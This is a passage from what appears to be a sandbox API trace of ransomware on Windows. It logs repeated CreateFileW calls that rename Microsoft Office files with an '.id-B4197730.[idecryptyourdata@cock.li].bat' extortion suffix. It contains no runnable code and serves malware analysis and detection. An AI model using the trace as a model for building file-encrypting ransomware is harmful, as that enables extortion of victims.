dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR21F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir21f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.794] CloseHandle (hObject=0x54c) returned 1 [0176.795] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.795] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR22F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir22f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.795] CloseHandle (hObject=0x54c) returned 1 [0176.795] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.796] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR23F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir23f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.796] CloseHandle (hObject=0x54c) returned 1 [0176.797] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.797] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR24F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir24f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.797] CloseHandle (hObject=0x54c) returned 1 [0176.797] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.798] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR25F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir25f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.798] CloseHandle (hObject=0x54c) returned 1 [0176.798] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.798] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR26F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir26f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.799] CloseHandle (hObject=0x54c) returned 1 [0176.800] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.800] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR27F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir27f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.800] CloseHandle (hObject=0x54c) returned 1 [0176.801] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.801] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR28F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir28f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.801] CloseHandle (hObject=0x54c) returned 1 [0176.802] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.802] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR29F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir29f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.802] CloseHandle (hObject=0x54c) returned 1 [0176.802] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.802] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.803] CloseHandle (hObject=0x54c) returned 1 [0176.804] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.804] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.804] CloseHandle (hObject=0x54c) returned 1 [0176.807] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.807] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR30F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir30f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.807] CloseHandle (hObject=0x54c) returned 1 [0176.808] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.808] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR31F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir31f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.808] CloseHandle (hObject=0x54c) returned 1 [0176.809] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.809] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR32F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir32f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.809] CloseHandle (hObject=0x54c) returned 1 [0176.810] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.810] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR33F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir33f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.810] CloseHandle (hObject=0x54c) returned 1 [0176.811] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.811] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR34F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir34f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.811] CloseHandle (hObject=0x54c) returned 1 [0176.813] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.813] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR35F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir35f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.813] CloseHandle (hObject=0x54c) returned 1 [0176.815] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.815] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR36F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir36f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.815] CloseHandle (hObject=0x54c) returned 1 [0176.817] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.817] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR37F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir37f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.818] CloseHandle (hObject=0x54c) returned 1 [0176.818] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.818] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR38F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir38f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.819] CloseHandle (hObject=0x54c) returned 1 [0176.819] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.819] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR39F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir39f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.820] CloseHandle (hObject=0x54c) returned 1 [0176.820] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.821] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.821] CloseHandle (hObject=0x54c) returned 1 [0176.822] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.822] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.822] CloseHandle (hObject=0x54c) returned 1 [0176.823] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.823] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR40F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir40f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.824] CloseHandle (hObject=0x54c) returned 1 [0176.824] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.824] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR41F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir41f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.824] CloseHandle (hObject=0x54c) returned 1 [0176.825] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.825] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR42F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir42f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.826] CloseHandle (hObject=0x54c) returned 1 [0176.826] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.826] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.827] CloseHandle (hObject=0x54c) returned 1 [0176.827] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.827] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.828] CloseHandle (hObject=0x54c) returned 1 [0176.828] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.828] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR44B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir44b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.966] CloseHandle (hObject=0x54c) returned 1 [0177.441] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.441] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0177.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNSET.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunset.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.441] CloseHandle (hObject=0x3f4) returned 1 [0178.475] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.478] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql70.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql70.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.478] CloseHandle (hObject=0x2b0) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7034e8 | out: hHeap=0x6a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b5f8 | out: hHeap=0x6a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dc0958 | out: hHeap=0x6a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3dd0960 | out: hHeap=0x6a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4082020 | out: 